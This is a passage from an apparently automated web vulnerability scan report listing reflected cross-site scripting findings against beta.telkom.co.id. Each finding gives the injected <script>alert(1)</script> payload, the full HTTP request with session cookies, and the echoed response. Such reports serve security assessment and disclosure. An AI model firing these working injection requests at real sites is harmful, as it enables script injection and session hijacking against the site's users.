2011&prad=64578880&arc=36816991&; ar_p104939219=exp=1&initExp=Sun Jun 19 22:38:12 2011&recExp=Sun Jun 19 22:38:12 2011&prad=9007&cpn4=1&arc=97&; ar_p90452457=exp=3&initExp=Fri Jun 17 15:21:04 2011&recExp=Mon Jun 20 16:57:27 2011&prad=310146149&arc=222480638&; ar_p82806590=exp=7&initExp=Sat May 21 12:32:31 2011&recExp=Thu Jun 23 22:13:14 2011&prad=62872914&arc=42476438&; ar_p97174789=exp=14&initExp=Tue May 17 20:12:51 2011&recExp=Fri Jun 24 13:26:47 2011&prad=242390407&arc=206438376&; BMX_3PC=1; UID=4a757a7-24.143.206.42-1305663172; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1308922027%2E341%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 24 Jun 2011 13:32:15 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 83

COMSCORE.BMX.Broker.handleInteraction3a324<script>alert(1)</script>ae0e732eb9f("");

4.22. http://beta.telkom.co.id/hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3a5c"><script>alert(1)</script>c7f881fbc98 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hubungan-investord3a5c"><script>alert(1)</script>c7f881fbc98/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.1.10.1308921355; __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:21:43 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23899
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<a href="/hubungan-investord3a5c"><script>alert(1)</script>c7f881fbc98/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html?&lid=en">
...[SNIP]...

4.23. http://beta.telkom.co.id/hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7349a<script>alert(1)</script>1dabfe6b8e6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hubungan-investor7349a<script>alert(1)</script>1dabfe6b8e6/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.1.10.1308921355; __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:21:48 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23893
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<b>/hubungan-investor7349a<script>alert(1)</script>1dabfe6b8e6/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html</b>
...[SNIP]...

4.24. http://beta.telkom.co.id/hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 9360a--><script>alert(1)</script>951e05938fc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /hubungan-investor9360a--><script>alert(1)</script>951e05938fc/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.1.10.1308921355; __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:21:57 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23902
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<a href="/hubungan-investor9360a--><script>alert(1)</script>951e05938fc/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html?&lid=en">
...[SNIP]...

4.25. http://beta.telkom.co.id/hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload f56a1--><script>alert(1)</script>3a5776513bf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /hubungan-investor/siaran-persf56a1--><script>alert(1)</script>3a5776513bf/undangan-acara-investor-company-site-visit-di-manado.html HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.1.10.1308921355; __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:22:35 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23902
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<a href="/hubungan-investor/siaran-persf56a1--><script>alert(1)</script>3a5776513bf/undangan-acara-investor-company-site-visit-di-manado.html?&lid=en">
...[SNIP]...

4.26. http://beta.telkom.co.id/hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7e46c<script>alert(1)</script>f7a1aef4314 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hubungan-investor/siaran-pers7e46c<script>alert(1)</script>f7a1aef4314/undangan-acara-investor-company-site-visit-di-manado.html HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.1.10.1308921355; __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:22:24 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23893
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<b>/hubungan-investor/siaran-pers7e46c<script>alert(1)</script>f7a1aef4314/undangan-acara-investor-company-site-visit-di-manado.html</b>
...[SNIP]...

4.27. http://beta.telkom.co.id/hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 617e2"><script>alert(1)</script>ed966d48c0c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hubungan-investor/siaran-pers617e2"><script>alert(1)</script>ed966d48c0c/undangan-acara-investor-company-site-visit-di-manado.html HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.1.10.1308921355; __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:22:19 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23899
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<a href="/hubungan-investor/siaran-pers617e2"><script>alert(1)</script>ed966d48c0c/undangan-acara-investor-company-site-visit-di-manado.html?&lid=en">
...[SNIP]...

4.28. http://beta.telkom.co.id/info-perusahaan/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /info-perusahaan/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 65705<script>alert(1)</script>c8c75b10326 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /info-perusahaan65705<script>alert(1)</script>c8c75b10326/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.2.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:24:51 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23710
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<b>/info-perusahaan65705<script>alert(1)</script>c8c75b10326/index.html</b>
...[SNIP]...

4.29. http://beta.telkom.co.id/info-perusahaan/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /info-perusahaan/

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 17160--><script>alert(1)</script>6ef070357e7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /info-perusahaan17160--><script>alert(1)</script>6ef070357e7/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.2.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:24:57 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23719
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<a href="/info-perusahaan17160--><script>alert(1)</script>6ef070357e7/index.html?&lid=en">
...[SNIP]...

4.30. http://beta.telkom.co.id/info-perusahaan/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /info-perusahaan/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0cb4"><script>alert(1)</script>252f949c3a2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /info-perusahaana0cb4"><script>alert(1)</script>252f949c3a2/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.2.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:24:47 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23716
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<a href="/info-perusahaana0cb4"><script>alert(1)</script>252f949c3a2/index.html?&lid=en">
...[SNIP]...

4.31. http://beta.telkom.co.id/pojok-media/artikel-infokom/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/artikel-infokom/

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 2384c--><script>alert(1)</script>ac061dfca82 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /pojok-media2384c--><script>alert(1)</script>ac061dfca82/artikel-infokom/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.5.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:30:09 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23360
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<title>TELKOM
...[SNIP]...
<a href="/pojok-media2384c--><script>alert(1)</script>ac061dfca82/artikel-infokom/index.html?&lid=id" class="blue">
...[SNIP]...

4.32. http://beta.telkom.co.id/pojok-media/artikel-infokom/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/artikel-infokom/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbff7"><script>alert(1)</script>ae3c0457ac0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pojok-mediacbff7"><script>alert(1)</script>ae3c0457ac0/artikel-infokom/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.5.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:29:59 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23752
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<a href="/pojok-mediacbff7"><script>alert(1)</script>ae3c0457ac0/artikel-infokom/index.html?&lid=en">
...[SNIP]...

4.33. http://beta.telkom.co.id/pojok-media/artikel-infokom/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/artikel-infokom/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f4080<script>alert(1)</script>71eea796522 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pojok-mediaf4080<script>alert(1)</script>71eea796522/artikel-infokom/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
